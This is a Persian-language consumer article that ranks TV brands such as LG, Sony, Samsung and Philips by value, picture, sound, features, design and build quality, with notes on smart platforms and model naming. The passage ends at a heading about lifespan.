شرکت ال جی از سال 2013 یعنی پس از سرمایه گذاری بر روی تکنولوژی  OLED در زمینه تلویزیون های هوشمند پیشرفت چشم گیری داشته است. تکنولوژی  OLED، تکنولوژی بود که برای ال جی ریسک بزرگی محسوب می شد. این شرکت تمام سعی خود را گذاشت تا با تمام مشکلات و تقص های این پنل مبارزه کند و به بهترین نحو ممکن آن را ارائه دهد. که در نهایت نیز نتایج رضایت بخشی برایش دربر داشت.

از اولین مدل های موفق این تکنولوژی می توان به ec970 و ec930 در سال 2015 اشاره کرد که در آن ها از تکنولوژی پنل اولد با ساختار SRGB بکار رفته بود، که بسیار محبوب و موفق بودند و برتری نسبت به دیگر رقبا را برای ال جی به ارمغان آوردند. نانوسل نیز نام تکنولوژی دیگری است که جدیدا در تلویزیون ها پرچمدار غیر اولد ال جی به کار رفته که برای مشتریان جذابیت به همراه داشته است.

خصوصیات تلویزیون های  LG

معرفی برندهای معتبر تلویزیون ، کمپانی ال جی همه ساله دست به عرضه تلویزیون های متنوعی با نازل ترین قیمت ممکن می کند که البته با مقایسه به رقبایشان به ندرت ارزش خوبی دارند. در طول چند سال گذشته، LG  به خاطر تلویزیون های LCD OLED و IPS شناخته شده اش بسیار محبوب شده است. توضیع OLED ها برای اولین بار به عنوان تکنولوژی انحصاری ال جی امری جالب توجه است. OLED ها کماکان شاهکار شرکت ال جی هستند که نقش بسیار تاثیر گذاری روی بازار ایفا می کنند و هنوز هم تولید کنندگان دیگر برای تولید این تلویزیون ها از قطعات خوب ال جی بهرمند می شوند.

مقایسه مزیت ها و معایب ال جی نسبت به سایر رقیبان

مزایای تلویزیون های ال جی

    به طور کلی هر دو تلویزیون های LED و OLED دارای زاویه دید بسیار خوبی هستند زاویه دیدی بزرگ و وسیع.

    یکی دیگر از ویژگی های بی نظیر ال جی پلت فرم بسیار هوشمند WebOS 3.5 هست که همچنان به عنوان یکی از بهترین پلتفرم های هوشمند شناخته می شود.

معایب تلویزیون های ال جی

    بجز مدل های OLED بالارده اکثر تلویزیون های ال جی دارای مشکل عمق سیاه و سفید یا به عبارتی کنتراست ضعیف هستند که باعث می شود کیفیت تصویر متوسط باشد. ( کنتراست به تضاد رنگی بین دو نقطه مجاور گفته می شود.)

    ال ای دی های ال جی معمولا از یکنواخت خاکستری بدی برخوردارند.

    رقبای ال جی دارای طراز عجیب و غریبی هستند که ، ارزش ضعیف محصولات ال جی اغلب در مقایسه با آن ها و در نتیجه بررسی ها به ندرت توصیه می شود.

تلویزیون های Smart کمپانی ال جی

معرفی برندهای معتبر تلویزیون ، ال جی در نام گذاری مدل های خود از ساختار جالبی استفاده می کند که تمامی محصولاتش را از تلویزیون های ارزان قیمت و کوچک با رزولوشن پایین تا OLED های بسیار بالارده پوشش می دهد. ساختاری که به شرح زیر است :

    مدل S * = Premium LED

    * J = 2017

    * H = 2016

    * F = 2015

    U * = 4K

    L * =1080p

مثال :

UH750 = تلویزیون 4K مدل 2016

لذا با توجه توضیحات فوق، با ملاک قرار دادن قیمت، ال جی در جایگاه اول قرار می گیرد. زیرا در هر بازه سایزی و قدرتمندی، ال جی محصولات بسیار ارزشمند به نسبت قیمت ارائه می کند که در سال های اخیر به اوج خودش رسید است.

2. برند سامسونگ

معرفی برندهای معتبر تلویزیون ، قرار گرفتن سامسونگ در رتبه دوم با توجه به در دست داشتن عمده سهم بازار تلویزیون ( بالای 80 درصد بازار)  چیزی بسیار عجیب و دور از تواقع است اما خراب کاری سامسونگ در سال 2017 در محصولات پرچمدار خود  و قیمت نامعقولی که برای آن ها و بعضی کالا های دیگر به نسبت پیشرفت های اندکی که داشتند تعیین شد باعث شد که شاهد نزول این برند به رتبه دوم باشیم.

امید است که سامسونگ بار دیگر به عملکرد تحسین برانگیز سال های قبل خود برگشته و دوباره شاهد حضور پرقدرت این برند جهانی در بین رقبای خود باشیم. پس از این دو برند، برندهای دیگر با فاصله نسبتا زیادی در رتبه های زیر قرار می گیرند

    3- برند شارپ

    4-  برند سونی

    5-  برند پاناسونیک

    6-  برند فلیپس

    و …

بهترین کیفیت تصویر

معرفی برندهای معتبر تلویزیون ، زمانی که می خواهیم کیفیت تصویر را مورد بررسی قرار دهیم، می باید مقوله های زیادی را در نظر بگیریم، از جمله زاویه دید، پشتیبانی از رنگ خاکستری و مشکی، رفرش ریت، کنتراست، گاما ریت  و… لذا در هنگام مقایسه تلویزیون ها از نظر کیفیت معمولا نمی توان برتری مطلق را به یک برند داد چرا که ممکن است تلویزیون ال جی رنگ مشکی را به نسبت سونی بهتر نشان دهد اما سونی زاویه دید بهتری برخوردار باشد.

شاید هم اینگونه نباشد، و برای مثال در سال 2017 برند سونی در تمامی استاندارد ها و ارائه کیفیت پنل رتبه نخست را از آن خود کرده بود با اینکه اولد های پرچمدار ال جی از کیفیت بسیار بالایی برخوردار بودند اما سونی در آن سال در تمام ضمینه ها چه اولد چه ال ای دی و چه بالارده و میان رده بهترین را ارائه داد. که البته از آن تاریخ تا به امروز ادامه دار بوده پس فعلا می توان گفت که بهترین مارک تلویزیون ها از لحاظ کیفیت تصویر باید به این صورت رده بندی شود:

1. برند سونی

شکی در این نیست که اکثر کاربران نام سونی را مترادف کیفیت می دانند چرا که سونی یک شرکت بسیار خوش نام هست که تماما بر پایه و اساس کیفیت و رضایت مشتری و کاربران بنا نهاده شده و وقتی حرف از کیفیت پنل و عمر و کیفیت قطعات می شود محال است اسمی از سونی در آن بین برده نشود. سونی میتوان گفت که بخش عمده ای از شهرت خودش را از کنسول های بازیش یعنی پلی استیشن هایش به دست آورده است.

این برند که یک کمپانی اصیل و بسیار با اقتدار ژاپنی هست ، در زمینه صوتی تصویری فعالیت دارد و در مقوله تلویزیون نیز هر سال به تلاش هایش  می افزاید و با تلاش و کوشش مهندسان و کارشناسان بسیار متجرب شاهد این هستیم که هرساله دیوایس های بسیار باکیفیتی از سونی به بازار های جهانی ارائه می شود.

 مخصوصا در سال های اخیر می توان گفت که سونی واقعا قوی ظاهر شده و محصولات واقعا قدرتمندی برای هر بازه قیمتی و هر رنج تلویزیونی ارائه داده است که واقعا شایدستگی خودش را برای جایگیری در مقام اول و یا حداقل جایگاهی نزدیک به اول اثبات می کند.

خصوصیات تلویزیون های  سونی

همان طور که قبلا هم اشاره کردیم شرکت سونی همواره ارائه بهترین کیفیت را متناسب با قیمت محصول سرلوحه کار خود قرار داده است بنا بر این تلویزیون های سونی به کلی یک انتخاب کاملا امن محسوب می شوند. سونی تمایل دارد که در این دسته از محصولات خود با رعایت نسبت خوبی از قیمت به کارایی ، کیفیتی عالی از تصویر را داشته باشد.  درست است مدل های بودجه ای و مقرون به  صرفه این شرکت ، رقابتی ترین تلویزیون ها آن نیستند اما تلویزیون های با کیفیت بالا و به ویژه تلویزیون های متوسط خود را در میان بهترین ها قرار می دهند، البته معمولا با قیمت بالا.

مزایا و معایب سونی نسبت به برندهای رقیب

معرفی برندهای معتبر تلویزیون ، همانند ال جی، بهترین تلویزیون های سونی هم OLED ها هستند که همان طور که گفته شد از قطعات خوب کمپانی ال جی استفاده می کنند ولی بر عکس ال جی ، تاثیر گذار ترین نقش این برند را در بازار ، LED های صاحب نام آن بازی می کنند.

مزایای تلویزیون های کمپانی سونی

    بی گمان الگوریتم ها و تکنیک های بزرگ نمایی هوشمندانه در تلویزیون های سونی یکی از فوق العاده ترین ویژگی های محصولات این شرکت است که فارغ از قیمت به یکی از خصوصیات تولیدات این شرکت بدل گردیده است. به نحوی که حتی مدل های ارزان قیمت این شرکت هم این قابلیت را بهتر از حد متوسط ارئه می دهند.

    مدیریت حرکت ( motion management ) زمینه ای است که کمپانی سونی به عنوان یک سازنده تلویزیون های بالارده در آن پیشگام است و به بهترین نحو ممکن ویژگی های مربوط به آن را ارائه می دهد. معمولا اکثر تلویزیون های سونی یک ویژگی فلیکر تصویر برای افزایش وضوح در حرکت دارند . این شرکت عموما بهترین حد اشباع از بهترین قابلیت ها را در این زمینه ارائه می دهد.

معایب تلویزیون های سونی

    امکانات هوشمند سنگین ، با وجود این که امکانات تلویزیون های آندروید فوق العاده هستند اما حجم بالای پردازش ، باعث کندی ( به اصطلاح تنبلی ) این تلویزیون ها می شود. تلویزیون های سونی در حالی که از ویژگی های خود در حال استفاده باشند، مستعد کاهش سرعت معمول هستند.

    قیمت گران. تلویزیون هایی که توسط سونی تولید می شوند معمولا از قیمت بالایی در رده خود برخودردارند.

تلویزیون ها هوشمند سونی

مدل های تلویزیون های سونی

مدل های تلویزیون های سونی بر این اساس نام گذاری می شوند.

    * E = 2017

    * D = 2016

    * C = 2015

    * B = 2014

مدل های بودجه با “KDL” آغاز می شوند و بقیه محدوده سونی با XBR آغاز می شود.

اولین رقم در کد اندازه آن می باشد، 3 تای آخر گویای مدل هستند. هرچه شماره مدل بالاتر باشد، گران تر خواهد بود.

برای مثال :

XBR55X900E  یک مدل 55 اینچ با وضوح بالا تولید سال 2017 است، در حالی که KDL32W600D  مدل 2016 32 اینچ  می باشد.

پلتفرم هوشمند سونی ( Sony smart platform )

معرفی برندهای معتبر تلویزیون ، اگر تا کنون از سیستم عامل آندروید بر روی گوشی های همراه یا تبلت ها استفاده کرده باشید ، اینتر فیس این پلتفورم برای شما آشنا خواهد بود. گرچه این پلتفورم سریع ترین و با کیفیت ترین پلتفورم موجود نیست اما ویژگی های آن دسته بندی شده و تعامل خوبی با تلفن های همراه ایجاد می کند که به دسترسی سریع تر به محتوا می انجامد.

اگر تا به حال از تلفن یا رایانه لوحی Android استفاده کرده اید، شما خودتان را بسیار آشنا با اینترفیس این پلتفورم پیدا میکنید و براحتی از آن سردرمیاورید. این پلتفورم باکیفیت ترین و سریعترین موجود نیست، اما ویژگی آن بسته بندی شده و تعامل خوبی با دستگاه های تلفن همراه ایجاد می کند و دسترسی به محتوای بسیار سریع تر را فراهم می کند. در حالی که رابط کاربری خود تغییر زیادی نداشته است، عملکرد آن به تدریج در طول سال ها به نقطه ای رسید که کمی بیشتر میتوان با آن بعنوان یک پلتفورم تلویزیون کنار آمد.

2. برند ال جی

ال جی برندی است که در این قسمت حتی میتوانستیم آنرا به عنوان رتبه اول معرفی کنیم اما دلیل این کار ما این بود که مفهوم بهترین کیفیت را تنها مربوط به سایز و نوع خاصی از تلویزیون یک شرکت و برند نمی دانیم. به جرعت می توان گفت OLED های وایلا ساخت کمپانی ال جی با کیفیت ترین پنل ها را بین تلویزیون ها دارا می باشند اما فقط پرچمدارهای گران قیمت آن که بالای 55 اینچ هستند.

    برند سامسونگ

    برند پاناسونیک

    برند شارپ

    برند توشیبا

    برند تی سی

و…

بالاترین کیفیت صدا

معرفی برندهای معتبر تلویزیون ؛ در زمان حاضر با روی کار آمدن محصولاتی از دسته سینمای خانگی و ساندباکس ها ، دیگر کاربران توجه زیادی به کیفیت صدای تلویزیون ها نمی کنند. ولی اگر بخواهیم برندهای گوناگون را از نظر کیفیت صدا رده بندی کنیم لیست ما این گونه خواهد بود:

برند ال جی

معرفی برندهای معتبر تلویزیون ،ال جی اعلام کرده است که شروع به همکاری با Harman / Kardon® کرده است. Harman / Kardon®  یکی از معتبر ترین نام ها در صنعت صوتی است که قرار است با همکاری مهندسان ال جی برای ایجاد یک سیستم صوتی و بلندگو کار کنند که می تواند صدای بدون خطا با باس عمیق و عریض همراه با باند گسترده ( ULTRA Surround ) ارائه دهد.

تکنولوژی ULTRA Surround یک سطح غوطه ور صوتی را با وفاداری شگفت انگیز به اجرا گذاشته و بیننده ها را در مرکز صدای پخش شده با شگفتی رها می کند. این سیستم که دارای برد بسیار بالایی است ، برای ارائه تجربیات واقعا سینمایی عرضه گردیده است و با دقت استثنایی به متعادل سازی صدا می پردازد. همچنین دارای یک پهنای باند وسیع و خروجی قدرتمند است.

تکنولوژی ULTRA Surround یک کیفیت سه بعدی صوتی را فراهم می کند که واقعا می توان از آن به عنوان یک طلسم یاد کرد. تکنولوژی ذکر شده با بهره گیری از الگوریتم پیشرفته صداهای حیرت انگیزی را تولید میکند که بسیار واقعی  با دقت بالا بوده و به معنای واقعی کلمه ، عالی هستند.

بیرون دهنده صوتی این دیوایس صدا را در جهات مختلف توزیع می کنند، متعادل کردن صداهای پیشین و پس زمینه برای مطابقت با عمل روی صفحه در حالی که گفتار نیز کاملا واضح است. برای مثال، در یک صحنه بارانی سنگین ، بینندگان احساس می کنند که قطره ها در اطرافشان فرو می ریزند، اما هنوز هم می توانند به وضوح صدای مکالمه و ریز ترین صداهای محیط را با شدت زیاد حس کنند و بشنوند.

صدای فراگیر در واقع تکنولوژی است که ازتعداد بیش از پنچ بلندگو برای شنیدن یک صدا ( معمولا فیلم سینمایی ) بهره می برد ، که از طریق صداگذاری بیشتر قابل انجام است.

نام هایی که این فناوری با آن به عنوان تکمیل کننده صدای استرویو شناخته می شود عبارتند از : ۵٫۱–۶٫۱–۷٫۱

پس از ال جی برندهای زیر به ترتیب در رتبه های کیفیت بالای صوتی قرار دارند:

    برد سونی

    برد سامسونگ

    برند فلیپس

    برند پاناسونیک

    برند شارپ

و…

بالاترین سطح قابلیت ها و امکانات ارائه شده

معرفی برندهای معتبر تلویزیون ، امروزه تلویزیون های ارائه شده به بازار جهانی دارای امکانات و قابلیت هایی چون نمایش تصاویر 3 بعدی ، امکانات هوشمند ، قابلیت تصویر در تصویر ، آینه ای کردن یا همان میررینگ ، کاهنده موضعی ، استقلال پیکسلی ، اچ دی آر ، انواع گیرنده ها و پورت های ورودی خروجی ، سرویس های استرمینگ ویدئو و … می باشند. لذا اگر بخواهیم این دستگاه ها را از نظر امکانات ارائه شده لیست کنیم :

برند ال جی

باز هم در این بخش برند خوش نام ال جی در ابتدای لیست قرار میگیرد. این برند غالبا امکانات بسیار متنوعی را بر روی محصولات خود ارائه میدهد که عموما هم در قالبی ارزا قیمت هستند.

Magic remote control های ال جی

معرفی برندهای معتبر تلویزیون ، کنترول از راه جادویی امکانی است که از موس کامپیوتر الهام گرفته شده است که یکی از قابلیت های جدید تلویزیون های هوشمند به شمار می رود. این وسیله قابلیت کنترل نقطه به نقطه و کلیک روی حرکت را فراهم می نماید.

کنترل های جادوی ال جی در مدل های بالاتر هر چند کوچک ترین در نوع خود نیستند اما یکی از خوش دست ترین و زیبا ترین کنترل های موجود هستند. بسیاری از دکمه های موجود در این ریموت از ریموت سامسونگ الگو گرفته اند با این تفاوت که این دکمه ها به وضوح برچسب گذاری شده اند و بدون نیاز به آموزش یا کتابچه راهنما می توانند به راحتی و سریعتر از راه دور استفاده شوند. متریال سازنده این ریموت کمی پلاستیکی تر از چیزی است که ادعا می شود لیکن هنوز هم در دست گرفتن آن حس بهتری نسبت به کنترل های فلزی سامسونگ و سونی دارد.

سیستم عامل یا همان پلتفورم تلویزیون های ال جی

معرفی برندهای معتبر تلویزیون ، تلویزیون های ال جی که از پلتفورم WebOS بهره می برند از تمامی فرمت های اصلی ، از طریق پورت یو اس بی بدون هیچ اشکال بزرگی پشتیبانی می کنند. فایل های 4k HDR به سادگی حتی در فرمت های رمزگذاری شده قابل پخش اند. مدل های او ال ای دی این برند حقیقتا یک تجربه عالی از مشاهده تصاویر را در ذهن مخاطب به جا می گذارند.

تلویزیون های ال جی با پلتفرم WebOS و ریموت کنترلر های جادویی ارائه می شوند دارای یک دکمه میکروفون بزرگ در مرکز کنترلر هستند که با یک بار فشار رابط کاربری جست و جو را به اجرا در می آورد و امکان جست و جوی محتوا را برای شما باز می کند. البته این کنترل دارای ایراداتی هم است ، از این قبیل که شما امکان تغییر روشنایی ، صدا یا … را همزمان با استفاده از این امکانات ندارید ، چیزی که در تلویزیون های سامسونگ موجود است.

ویژگی دیگر که با میکروفون در راه دور همراه است ، قابلیت کالیبره کردن بلندگوهای تلویزیون نسبت به اتاق شما است. اگر در تنظیمات صدا، ویژگی “تنظیم صدا سحر و جادو” را فعال کنید و از طریق فرآیند موجود کالیبراسیونرا به نحو احسنت انجام دهید متوجه می شوید که این ویژگی به میزان قابل توجهی به کیفیت صدا کمک می کند.

پلت فرم ال جی

معرفی برندهای معتبر تلویزیون ، پلتفرم هوشمند ال جی یکی از پلت فرم های خوب موجود در حال حاضر است. این پلتفرم با وجود این که طی سال ها تغییر چندانی نداشته است اما باز هم این سیستم عامل جزء بهترین ها به حساب می آید ، به روز رسانی ها و اصلاحات افزایشی ال جی برای این پلتفرم توانسته است که آن را در بالاترین سطح ممکن در بین پلتفرم های موجود قرار دهد.

این سیستم عامل که در نگاه اول به نظر می رسد همان نسخه اول ارائه شده است در واقه به نقطه ای درحفظ حالت و بلوغ خود رسیده که میتوان ادعا کرد تقریبا از هر نظر کامل است.

نمایشگرهای OLED

معرفی برندهای معتبر تلویزیون ، OLED ها نمایشگرهایی هستند که در آن ها به جای دیود های معمولی از دیود های ساطع کننده نور طبیعی استفاده شده است که بر اساس تحقیقات علمی و گزارشات فنی بهترین کیفیت تصویر را در میان تلویزیون های امروزی دارا می باشند.

فناوری OLED باعث می شود که هر پیکسل به تنهایی خاموش و روشن شود که این قابلیت  باعث کنتراست بی نهایت و نمایش بی نقص رنگ مشکی می گردد و علاوه بر آن تلویزیون را از داشتن نور پس زمینه بی نیاز می نماید. به اضافه این ها OLED ان قابلیت را دارد که با دقتی باور نکردنی لبه‌های تصویر را پردازش کند و حتی کوچکترین جزئیات آن را نشان دهد.

همچنین نمایش رنگ مشکی عمیق در تلویزیون‌های OLED پس زمینه عالی را برای رنگ‌های تند و متنوع فراهم میکند می‌کند و اجازه نمی دهد تداخل نور مشکلی در نمایش تصویر بوجود بیاید. همچنین تمام مدل‌های تلویزیون OLED ال‌جی قابلیت پشتیبانی از دو فرمت تصویری HDR  را دارا هستند که شامل فرمت‌های HDR به نام Dolby VisionTM  و HDR10 می‌شود.

تلویزیون‌های OLED ال‌جی با انعطاف بی‌نظیری به روزترین کیفیت تصویر HDR  را به نمایش می‌گذارد. زاویه تماشای بسیار عریض این تلویزیون در کنار همه این ویژگی ها ، این تلویزیون را به گزینه ای مناسب به عنوان قلب تپنده یک خانه ایدآل تبدیل می کند.

2. برند سامسونگ

معرفی برندهای معتبر تلویزیون ؛ سامسونگ را به خاطر کیفیت و تکامل امکانات ارائه شده اش به راحتی می توان در رتبه دوم این لیست قرار داد. تلویزیون های ال جی از پلتفورم تایزن استفاده می کنند که پلتفورمی اثبات شده و رضایت بخش است. محصولات این کمپانی از نظر کیفیت صدا ، کیفیت طراحی و ساخت ، امکانات جانبی ، قابلیت های نمایشگر و … همه و همه در سطح  عالی قرار دارند.که باعث شده اند این برند در میان مخاطبین به عنوان یک برند خوش نام و مطمعن شناخته شود.

پلتفورم تلویزیون های هوشمند سامسونگ

معرفی برندهای معتبر تلویزیون ، در ابتدا که سامسونگ تلویزیون های هوشمند را که در انحصار خود بودند برای اولین بار به بازار ارائه کرد طبیعتا خود رهبر و صاحب بازار آن بود. البته این به آن مفهوم نیست که این تلویزیون ها بسیار خوب بودند ، چرا که چند سال طول می کشد که یک سیستم عامل هوشمند تلویزیون بتواند خود را اثبات نماید.

نهایتا ال جی در سال 2014 توانست با ارائه سیستم عامل WebOS سامسونگ را از مقام اول به رتبه دوم تنازل دهد. البته شرکت سامسونگ هم در سال 2015 با بروز رسانی پلتفورم smart hub  خود بر اساس سیستم عامل تایزن توانست پاسخ خوبی به این مسئله بدهد .

این ارتقاء قابل توجه بود اما هنوز دارای توان کافی و صفات بهتر از WebOS نبود و نتوانست سامسونگ را به جایگاه پیشین خود باز گرداند. همچنین در سال 2017 این کمپانی پلتفرمی را به صورت چهره سازی ارائه نمود ، تغییر پالت رنگ و به روز رسانی قابلیت های کنترل صدای هوشمند که همون دستور صوتی بود.

بعد از این دو برند ، برند های زیر به ترتیب در این لیست جای دارند.

    برند سونی

    برند فلیپس

    برند پاناسونیک

    برند شارپ

و…

بالاترین کارایی

معرفی برندهای معتبر تلویزیون ، یکی دیگر از اساسی ترین و مهم ترین ملاک ها  در خرید تلویزیون های هوشمند و هر وسیله ی دیگری میزان کارایی و کار آمدی آن است. کارایی در واقع همان میزان استفاده فرد از تلویزیون دارد یا به عبارت بهتر ، استفاده هایی که فرد می تواند از تلویزیون خود داشته باشد مثلا : بازی کردن ، مشاهده فوتبال ، تماشای فیلم ، تماشای شبکه های تلویزیونی ، گوش دادن به شبکه های رادیویی ، پخش موسیقی و ….

با توجه به کارایی رده بندی بهترین برند های تلویزیونی به این شکل خواهد بود:

1. برند سونی

معرفی برندهای معتبر تلویزیون ، همان طور که قبلا هم به آن اشاره کردیم ، سونی برندی است که همواره کیفیت را سرلوحه کار خود قرار داده و هر گاه که صحبت از صوت و تصویر و لوازم و تجهیزات الکترونیکی و الکتریکی است قطعا از آن به عنوان بهترین یا حداقل یکی از بهترن ها یاد می شود.

این برند با سابقه چندین ساله خود توانسته اعتماد تمامی کاربران و کارشناسان و متخصصان این زمینه را با توجه به اجناس و قطعات بکار رقته و تکنولوژی ها و روند ساخت و کار آن ها ، به خود جلب کند.این کمپانی همیشه در تمامی محصولات و فعالیت های خود با کیفیت ترین حالت ممکن را ارائه داده است. بی گمان می توان چشم بسته سونی را با کیفیت ترین برند تلویزیون های هوشمند از نظر جنس و طول عمر و کیفیت ساخت لقب داد ..

در رابطه با تلویزیون های سونی و مزایا و معایب آن ها بالاتر در همین متن آنچه که لازم بود را گفته ایم و فقط به این گفته بسنده می کنیم که گستره وسیع امکانات و قابلیت های تلویزیون سونی ، کیفیت بالای آن در ارائه تصاویر ، پشتیبانی و سازگاری گسترده ی آن با دیگر لوازم جانبی ، همه و همه باعث شده که سونی در رده ی اول برندها در زمینه کارایی محصولات قرار گیرد.

2. برند ال جی

معرفی برندهای معتبر تلویزیون ، ال جی الکترونیک نیز به واسطه رونمایی و سرمایه گذاری عظیم و موفقیت آمیز بر روی پروژه های اولد خود توانسته بسیار بسیار بازی را در بازار به نفع خود پیش ببرد و نسبت به چند سال قبل چندین پله را یکدفعه صعود کرده و حالا یک برند بسیار باکیفیت یا حتی باکیفیت ترین برند ارائه دهنده اولد OLED تیوی ها باشد .

لذا بنابر کیفیت ارائه شد و نیز امکانات بالای تلویزیون های این برند ، میتوان این برند را در رتبه دوم از نظر کارایی عنوان کرد که احتمال صعود آن به رده اول نیز بالاست.

    برند سامسونگ

    برند پاناسونیک

    برند فلیپس

    برند شارپ

    برند توشیبا

و…

بهترین طراحی ظاهری

معرفی برندهای معتبر تلویزیون ، از طرفی تمامی برندهای معروف معمولا از طراحی زیبا و شکیلی برخوردارند و نیز هر کدام ویژگی ها و خصوصیات ظاهری خود را دارا می باشند. از طرف دیگر زیبایی در طراحی یک عنصر سلیقه ای است و نمی توان به قطع گفت که چه برندی زیباترین طراحی را دارد لیکن با میانگین نظر کارشناسان و کاربران می توان مارک ها را مانند زیر رده بندی کرد :

1. برند سامسونگ

معرفی برندهای معتبر تلویزیون ، سامسونگ برندی است که محصولات آن همواره در عین داشتن طراحی ساده از زیبایی ستودنی برخوردار بوده اند. ولی امسال سامسونگ با ارائه پرچمدار جدید خود همگان را حیرت زده کرد. تلویزیون های QLED که جدیدا توسط سامسونگ به بازار ارائه شده اند نه تنها تمامی خواسته های شما را در رابطه با یک تلویزیون هوشمند بر طرف می کنند بلکه به تلفیق یک قطعه هنری با محیط زندگی شما می پردازند.

یکی از جدیدترین ویژگی های تلویزیون های سامسونگ که Ambient Mode نامیده می شود صفحه نمایش خاموش را به یک نمایشگر جدید تبدیل می کند و کابل نامرئی نیز تمام کابل های داده و برق را در کنار هم به صورت یک کابل واحد قرار میدهد. تمامی این عوامل دست در دست هم می دهند تا نوعی هماهنگی با محیط اطراف را ایجاد کنند.

Ambient Mode را بهتر بشناسیم

با پیشرفت فناوری و ارائه تلویزیون های LCD که با حذف لامپ تصویر در آن ها یک صورت تخت پیدا کرده بودند ، کم کم کاربران علاقمند شدند که دیوایس خود را بر روی دیوار نصب کنند. این کار علاوه بر این که آنان را از تهیه میز های آنچنانی معاف می کرد مزایای دیگری هم دارد.

تلویزیون وسیله ای است که در اکثر خانه ها حداکثر به مدت 4 الی 5 ساعت از آن استفاده می شود ولی فضای نسبت زیادی از منزل را به اشغال خود در می آورد . این بدان معناست که نصب تلویزیون بر روی دیوار باعث خواهد شد که فضای کمتری از اتاق شما را اشغال نموده و در عین حال هر گونه غبار و اثر انگشت بر روی آن به راحتی مشاهده شود.

یک خانه زیبا را تصور کنید که دیوارهای آن به زیبایی دیزاین شده اند ، آیا وجود یک مربع سیاه نا هماهنگ در وسط این دیوار ها به اسم تلویزیون جالب است ؟

طبیعتا که خیر ، قابلیت Ambient Mode دقیقا همان راه حلی است که امسال سامسونگ در تلویزیون های QLED خود از آن رو نمایی کرد. Ambient Mode به این طریق عمل می کند که صفحه نمایش خالی به نمایشگری برای ارائه اطلاعات و تصاویر تبدیل می شود. این ویژگی تلویزیون های سامسونگ، با استفاده از عکس گرفته شده از دیوار از طریق SmartThings، می تواند الگوی دیوار پشت تلویزیون را تقلید کند.

جزئیات تصویر مانند کنتراست و میزان روشنایی را می توان تغییر داده و تصویر را واضح تر کرد. البته این تنها کاربرد این قابلیت نیست. یکی دیگر از امکانات این فناوری این است که کاربران می توانند عکس های خانوادگیشان را بر روی نمایشگر تلویزیون، نمایش دهند و آنها را با الگوی دیوار تلفیق کنند.

ویژگی دیگر این است که این تلویزیون ها میتوانند شرایط بیرونی مانند وضعیت آب و هوا را نیز گزارش دهند به حدی که کاربر میتواند صدای باران را از طریق تلویزیون QLED در یک هوای بارانی بشنود.

یک ویژگی دیگر هم این که ، تلویزیون می تواند تشخیص دهد که آیا کاربران در نزدیکی آن هستند یا خیر و اگر کاربران در نزدیکی آن نباشند به صورت خودکار خاموش شود که این ویژگی خود می تواند باعث صرف جویی زیادی در مصرف انرژی گردد. در تاریکی، Ambient Mode به صورت اتوماتیک خاموش می شود تا از مصرف بیهوده انرژی جلوگیری کند.

تکنولوژِی دیگر استفاده شده در این تلویزیون ها کوانتوم دات نام دارد که با مشکل سوختن تصویر مواجه نمی شود. سامسونگ به قدری در این رابطه مطمعن است که گارانتی 10 ساله را برای این مورد ارائه میدهد.

یک کابل به جای همه !

معرفی برندهای معتبر تلویزیون ؛ تلویزیون های QLED سامسونگ دست خوش یک نو آوری دیگر از جانب شرکت سامسونگ هستند که به تلفیق کابل مشهور است ، این بدان معناست که یک کابل واحد برای پنهان کردن تمامی کابل های متصل به این تلویزیون تعبیه شده است. تکنولوژی های ارتباطی اپتیکال و SerDes استفاده شده در این کابل نا مرئی ، این امکان را به آن می دهند که سیگنال های صوتی و تصویری و داده ها را با سرعت بسیار بالایی انتقال دهد. البته انتقال داده ها با سرعت بالا در کابل های اپتیکال باعث ایجاد نویز می گردد اما سامسونگ این مشکل را هم با استفاده از تکنولوژِی کاهش خطا از میان برداشته است.

2. برند ال جی

معرفی برندهای معتبر تلویزیون ، OLED های ال جی نیز طراحی بسیار نازکی با پنلی خیلی خیلی نازک و طراحی زیبا و بروزی را به رخ رقبای خود می کشد که با قرار دادن در هر محیطی بسیار شیک و متناسب دیده می شود. مخصوصا از سری های 8 و 9 این کمپانی که از پنل های IPS برخوردارند می توان به عنوان نمونه بارز این زیبایی و ظرافت یاد کرد که همواره در رده پرمیوم دیزاین ها جای می گیرند.

حقیقت این است که طراحی های سامسونگ و ال جی فرق چندانی با هم ندارند منتها سامسونگ در طراحی خود حس لوکس تری را القا می کند که آنرا در ابتدای لیست قرار می دهد.

در ادامه برندهای زیر برابر طراحی بهتر به ترتیب در لیست قرار میگیرند

    برند سونی

    برند شارپ

    برند فلیپس

    برند پانا سونیک

و …

بالاترین کیفیت در ساخت

معرفی برندهای معتبر تلویزیون ، باز هم حرف از کیفیت شد و باز هم مثل همیشه نام سونی آن را دنبال می کند. بی شک تلویزیون های سونی چه از نظر استحکام بدنه و چه از نظر عمل مونتاژ و … در راس رتبه بندی قرار می گیرند. بنابراین رده بندی ما به این صورت خواهد بود.

1. برند سونی

سونی واقعا کیفیت به شدت بالایی رو در تولیداتش ارائه می دهد. کیفیتی که این کمپانی را در این زمینه به خصوص با اختلاف زیادی یک سر و گردن بالاتر از رقبایش قرار می دهد. جالب تر این که هر ساله به این کیفیت افزوده می شود و هر بار سونی با دست پر به میادین رقابت پای می گذارد. امسال نیز سونی با بهترین تلویزیون های ال ای دی خود کهدر تمامی سایز ها واقعا کیفیت باور نکردنی دارند ،  وارد بازار جهانی شد که باز هم شاهکاری دیگر از این کمپانی را شاهد بودیم.

2. برند فلیپس

شرکت هلندی فیلیپس که در سال 1891 توسط جرارد فیلیپس در شهر آیندهوون تاسیس شد یک کمپانی چند ملیتی تجهیزات الکترونیکی است که دفتر مرکزی آن در حال حاضر در شهر آمستردام قرار دارد. این شرکت با تعداد کارکنانی بیش از 122000 یکی از بزرگترین کمپانی های تولید کننده تجهیزات الکترونیکی جهان است.

شرکت فیلیپس مخصوصا در زمینه تولیدات تجهیزات روشنایی و نور پردازی ، شهرت جهانی داشته و به عنوان بزرگ ترین تولید کننده ی این محصولات شناخته می شود. سهام این شرکت در بازار بورس یورونکست آمستردام و نیز فهرست ثانویه بازار بورس نیویورک معامله می گردد. این کمپانی پس از ارائه اولین تلویزیون های هوشمند خود که کیفیت بسیار خوبی داشتند بازار گرمی را رقم زد و نظر بسیاری را به خود جلب کرد که فیلیپس را تبدیل به نامی آشنا در این عرصه نمود.

فیلیپس چه از نظر تصویر و چه از نظر طراحی امکانات جانبی قابلیت های انحصاری خود را ارائه نموده است که  راه این کمپانی را از بقیه سوا می کند و مشتری های خاص خود را برای آن به ارمغان می آورد.

سونی و فیلیپس این فهرست به این صورت ادامه می یابد :

    برند سامسونگ

    برند پاناسونیک

    برند ال جی

    برند شارپ

    برند توشیبا

    برند تی سی ال

و…

بالاترین طول عمر و کمترین خرابی

